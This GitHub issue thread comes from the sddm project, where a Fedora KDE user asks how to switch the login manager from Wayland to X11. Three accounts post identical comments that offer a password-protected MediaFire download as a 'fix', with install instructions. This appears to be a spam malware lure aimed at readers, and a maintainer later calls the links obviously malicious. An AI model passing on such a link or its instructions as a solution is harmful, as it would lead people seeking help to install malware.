### ISSUE TITLE
I cannot Switch SDDM from Wayland to X11

### ISSUE THREAD

**Issue by bighero3007** [sddm/sddm#1981]
Hi i have noticed that i cannot switch my sddm session from wayland to x11 i tried everything on the internet at least what i could find
i run fedora 40 workstation kde plasma spin and i installed x11 as i have issues in wayland mostly with graphics so its a necceceary evil to use x11 but because i use sddm i havve the issue of it running in wayland and me having many issues can you help me??

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Vogtinator** [comment]
That depends on your distro, try to ask them.

**Comment by bighero3007** [comment]
thanks im gonna ask them

**Comment by bighero3007** [comment]
btw what about the other messages i didnt download anything but what about them

**Comment by Vogtinator** [comment]
Obviously malicious links.
